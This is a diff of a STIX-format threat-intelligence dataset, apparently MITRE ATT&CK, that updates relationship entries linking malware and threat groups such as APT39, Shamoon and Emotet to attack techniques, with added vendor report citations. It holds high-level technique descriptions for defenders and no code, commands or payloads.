"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-061518-4639-99"
}
],
- "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--448a35fc-fecf-4373-9888-30c37dd1d56a",
@@ -118699,12 +119860,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055"
},
{
"id": "relationship--c6dc9631-b324-47d1-8bbd-975d20fa5e58",
@@ -119290,12 +120451,12 @@
"url": "https://github.com/SpiderLabs/Responder"
}
],
- "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e"
},
{
"id": "relationship--4f3473a4-f5f5-43d8-a4ec-589763695942",
@@ -120432,36 +121593,15 @@
"description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018."
}
],
- "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses macros for execution.(Citation: TrendMicro MacOS April 2018)",
+ "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)",
"id": "relationship--60bab055-6927-4240-8716-6218dc131aa9",
"source_ref": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-19T19:09:17.815Z",
+ "modified": "2020-06-23T20:11:11.926Z",
"created": "2019-01-30T19:18:20.194Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Cybereason Cobalt Kitty 2017",
- "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
- "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"
- }
- ],
- "description": "[Denis](https://attack.mitre.org/software/S0354) executes shellcode on the victim's machine.(Citation: Cybereason Cobalt Kitty 2017)",
- "id": "relationship--771f612d-ba60-4c3b-a2aa-30ba107ebb50",
- "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
- "type": "relationship",
- "modified": "2020-03-20T17:02:09.502Z",
- "created": "2019-01-30T20:01:45.520Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -120493,7 +121633,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
"type": "relationship",
- "modified": "2019-07-24T19:17:09.484Z",
+ "modified": "2020-06-24T14:37:18.197Z",
"created": "2019-02-01T14:35:39.623Z"
},
{
@@ -120531,11 +121671,16 @@
"source_name": "FireEye APT33 Guardrail",
"url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "(Citation: FireEye APT33 Guardrail)",
+ "description": "(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.688Z",
+ "modified": "2020-06-22T20:15:32.325Z",
"created": "2019-02-05T13:14:45.865Z"
},
{
@@ -120741,11 +121886,11 @@
"source_name": "Impacket Tools"
}
],
- "description": "[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)",
+ "description": "[Impacket](https://attack.mitre.org/software/S0357) modules like ntlmrelayx and smbrelayx can be used in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040) and [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001) to gather NetNTLM credentials for [Brute Force](https://attack.mitre.org/techniques/T1110) or relay attacks that can gain code execution.(Citation: Impacket Tools)",
"relationship_type": "uses",
"id": "relationship--0318431e-ad44-44c7-97be-686d4efe79f4",
"type": "relationship",
- "modified": "2019-04-18T21:49:12.807Z",
+ "modified": "2020-03-31T22:20:18.066Z",
"created": "2019-02-07T19:13:01.960Z"
},
{
@@ -121781,13 +122926,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--f60a3a4e-ba53-47ba-8e31-e301f3983f6e",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.389Z",
+ "modified": "2020-05-22T19:37:14.333Z",
"created": "2019-02-21T21:11:08.102Z"
},
{
@@ -121804,11 +122954,21 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "(Citation: FireEye APT39 Jan 2019)",
+ "description": "(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.856Z",
+ "modified": "2020-05-29T13:22:52.472Z",
"created": "2019-02-21T21:12:55.702Z"
},
{
@@ -121825,11 +122985,26 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Dark Reading APT39 JAN 2019",
+ "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764",
+ "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "(Citation: FireEye APT39 Jan 2019)",
+ "description": "(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Dark Reading APT39 JAN 2019)(Citation: Symantec Chafer February 2018)",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.861Z",
+ "modified": "2020-05-29T13:22:52.503Z",
"created": "2019-02-21T21:12:55.710Z"
},
{
@@ -121846,11 +123021,16 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "Dark Reading APT39 JAN 2019",
+ "url": "https://www.darkreading.com/attacks-breaches/iran-ups-its-traditional-cyber-espionage-tradecraft/d/d-id/1333764",
+ "description": "Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020."
}
],
- "description": "(Citation: FireEye APT39 Jan 2019)",
+ "description": "(Citation: FireEye APT39 Jan 2019)(Citation: Dark Reading APT39 JAN 2019)",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.858Z",
+ "modified": "2020-05-22T18:17:56.892Z",
"created": "2019-02-21T21:12:55.714Z"
},
{
@@ -121907,13 +123087,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--42ddce39-b653-4466-b7ff-a9554029f1c6",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.432Z",
+ "modified": "2020-05-29T13:22:52.530Z",
"created": "2019-02-21T21:17:37.811Z"
},
{
@@ -121949,13 +123134,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks for persistence. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--54d5380e-07a4-49b0-8ffd-c34428c90bbe",
"type": "relationship",
- "modified": "2020-03-28T21:23:36.695Z",
+ "modified": "2020-05-29T13:22:53.001Z",
"created": "2019-02-21T21:17:37.821Z"
},
{
@@ -121985,19 +123175,29 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"external_references": [
{
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has used nbtscan to discover vulnerable systems. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used nbtscan and custom tools to discover remote systems. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--964233cc-fa6c-4754-9684-6546eb6d5a4a",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.495Z",
+ "modified": "2020-05-29T14:02:52.638Z",
"created": "2019-02-21T21:17:37.831Z"
},
{
@@ -122033,13 +123233,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 proxies between infected hosts. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 and custom protocol proxies between infected hosts. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--e2ebd73f-9198-49c7-b446-00478a466e78",
"type": "relationship",
- "modified": "2020-03-20T21:49:34.088Z",
+ "modified": "2020-05-29T13:22:53.074Z",
"created": "2019-02-21T21:17:37.928Z"
},
{
@@ -122117,13 +123322,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) used a custom port scanner known as BLUETORCH (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--02caaeff-7429-444f-bac2-498fe3a73cfd",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.635Z",
+ "modified": "2020-05-29T13:22:53.006Z",
"created": "2019-02-21T21:17:37.975Z"
},
{
@@ -122180,13 +123390,23 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious attachment. (Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious attachment. (Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--4e50db0c-4e54-4266-b675-3b279ec45427",
"type": "relationship",
- "modified": "2020-03-17T13:51:08.389Z",
+ "modified": "2020-05-29T13:22:53.078Z",
"created": "2019-02-22T20:59:17.640Z"
},
{
@@ -123738,31 +124958,36 @@
"target_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"external_references": [
{
- "source_name": "Symantec Shamoon 2012",
+ "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.",
"url": "https://www.symantec.com/connect/blogs/shamoon-attacks",
- "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019."
+ "source_name": "Symantec Shamoon 2012"
},
{
- "source_name": "FireEye Shamoon Nov 2016",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html",
"description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.",
- "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"
+ "source_name": "FireEye Shamoon Nov 2016"
},
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
},
{
- "source_name": "Unit 42 Shamoon3 2018",
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
"url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
- "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019."
+ "source_name": "Unit 42 Shamoon3 2018"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) attempts to overwrite operating system files and disk structures with image files.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016) In a later variant, randomly generated data was used for data overwrites.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)",
"relationship_type": "uses",
"id": "relationship--4b4ac061-dee5-44f3-b0f5-021889eae45e",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.367Z",
+ "modified": "2020-05-29T18:11:24.435Z",
"created": "2019-03-15T13:45:43.244Z"
},
{
@@ -124069,16 +125294,21 @@
"target_ref": "tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b",
"external_references": [
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
- "description": "(Citation: Symantec MuddyWater Dec 2018)",
+ "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"relationship_type": "uses",
"id": "relationship--97068a5a-faff-4212-a841-c06db163452e",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.098Z",
+ "modified": "2020-05-18T19:46:02.261Z",
"created": "2019-03-25T14:30:39.398Z"
},
{
@@ -124770,7 +126000,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661",
- "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
"external_references": [
{
"description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.",
@@ -124782,7 +126012,7 @@
"relationship_type": "uses",
"id": "relationship--d9bfa498-69a1-44f9-8e44-67a6a4c48088",
"type": "relationship",
- "modified": "2020-03-23T16:57:49.270Z",
+ "modified": "2020-04-29T22:25:05.277Z",
"created": "2019-03-26T13:38:24.635Z"
},
{
@@ -124983,37 +126213,6 @@
"modified": "2019-04-24T20:02:45.183Z",
"created": "2019-03-26T16:19:52.441Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
- "target_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "external_references": [
- {
- "source_name": "Talos Nyetya June 2017",
- "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
- "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019."
- },
- {
- "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
- "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A",
- "source_name": "US-CERT NotPetya 2017"
- },
- {
- "source_name": "Talos Nyetya MEDoc 2017",
- "url": "https://blog.talosintelligence.com/2017/07/the-medoc-connection.html",
- "description": "Maynor, D., Nikolic, A., Olney, M., and Younan, Y. (2017, July 5). The MeDoc Connection. Retrieved March 26, 2019."
- }
- ],
- "description": "[NotPetya](https://attack.mitre.org/software/S0368)'s initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: Talos Nyetya MEDoc 2017)",
- "relationship_type": "uses",
- "id": "relationship--e5790d71-64cb-4db3-aeba-702bca1ba5f0",
- "type": "relationship",
- "modified": "2020-03-16T21:27:41.168Z",
- "created": "2019-03-26T16:19:52.444Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -125512,7 +126711,7 @@
"relationship_type": "uses",
"id": "relationship--cc4f0b64-db39-4546-a5fc-a518ecc5438b",
"type": "relationship",
- "modified": "2019-06-28T15:25:29.853Z",
+ "modified": "2020-07-15T13:03:46.660Z",
"created": "2019-03-26T19:23:02.065Z"
},
{
@@ -125542,7 +126741,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Symantec Emotet Jul 2018",
@@ -125574,7 +126773,7 @@
"relationship_type": "uses",
"id": "relationship--88309efb-b366-4c4a-bd23-ba43b9f05c4c",
"type": "relationship",
- "modified": "2020-03-19T19:31:20.314Z",
+ "modified": "2020-06-23T19:51:01.709Z",
"created": "2019-03-26T19:23:02.073Z"
},
{
@@ -125989,16 +127188,21 @@
"target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
